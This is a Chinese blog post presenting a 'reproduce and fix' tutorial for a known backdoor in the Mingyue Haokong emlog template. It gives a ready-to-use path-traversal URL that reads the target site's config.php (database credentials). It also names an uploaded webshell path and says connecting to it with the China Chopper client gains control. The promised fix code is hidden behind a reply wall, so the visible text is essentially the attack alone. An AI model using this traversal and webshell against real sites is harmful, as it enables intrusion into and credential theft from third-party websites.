欢迎光临
我们一直在努力

明月浩空emlog模板漏洞复现+修复教程

明月浩空emlog模板漏洞复现+修复教程,这是今晚Jython投的稿,微尘发现这是一个远古漏洞了,但是不排除还有用的。他做的教程视频,讲的很详细,尽管我感觉这漏洞没必要投稿了但还是发出来吧。毕竟小白多,我再加点文字补充
利用代码:/content/templates/limh.me/function/image.php?url=../../../../config.php
直接在漏洞站后面加该地址即可,然后右键查看源代码。(这后门很早了,但是还是感觉挺恶心的)
漏洞复现 内容

上传成功后 马的地址
/content/plugins/2/2.php
使用菜刀连接可获得权限
修复代码如下

Jython Qq2460606067的视频投稿

下载链接回复可见

注意:本段内容须成功“回复本文”后“刷新本页”方可查看!

您可以选择一种方式赞助本站

支付宝扫一扫赞助 微信钱包扫描赞助

转载请保留版权:微尘博客www.clocti.com微尘博客 » 明月浩空emlog模板漏洞复现+修复教程

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  • 登录

    忘记密码 ?

    切换登录

    注册